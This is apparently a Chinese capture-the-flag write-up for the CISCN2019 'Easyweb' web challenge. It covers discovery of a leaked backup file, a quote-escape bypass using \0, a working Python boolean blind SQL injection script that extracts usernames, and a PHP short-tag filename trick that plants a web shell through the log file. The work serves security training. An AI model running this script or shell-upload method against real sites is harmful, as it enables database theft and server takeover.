[CISCN2019 总决赛 Day2 Web1]Easyweb

1. 知识点

  • 备份文件泄露
  • SQL注入利用
  • php短标签

2.感悟

这到题,我就写到SQL注入的地方,成功绕过了单引号的限制用\0,但是没有往盲注上想。以为是任意文件下载。看完题解,知道了思路应该是bool盲注,语句成功的话,就让id = 1,回显正常,错误的话 id = 0,就什么都没有。 这是我没有想到的,气死我了,应该是可以想到了。

3.实践

3.1 image.php.bak

御剑扫描到robots.txt,打开提示有备份文件,最后找到这个文件,然后下载下来

3.2 SQL注入

对单引号进行了过滤,无法闭合单引号,所以我们用\0来转义掉它的单引号。输入\0,经过“addslashes”函数会先变成\\0,然后经过“str_replace”函数,会变成\,这样,就把id后面的单引号给转义了。附上SQL注入代码:

import  requests

url = "http://d4035b3f-eaac-4675-8c17-e1de75f3d193.node3.buuoj.cn/image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r):
        payloads = payload.format(i,mid)
        print(url+payloads)
        html = requests.get(url+payloads)
        if "JFIF" in html.text:
            l = mid +1
        else:
            r = mid
        mid = (l + r)>>1
    result+=chr(mid)
    print(result)

3.3 php短标签

因为不允许上传带php的文件名,我们用php短标签来绕过
可以用来代替。这个文件名,会被写入日志文件中去,然后用菜刀连接。

你可能感兴趣的:(CTF)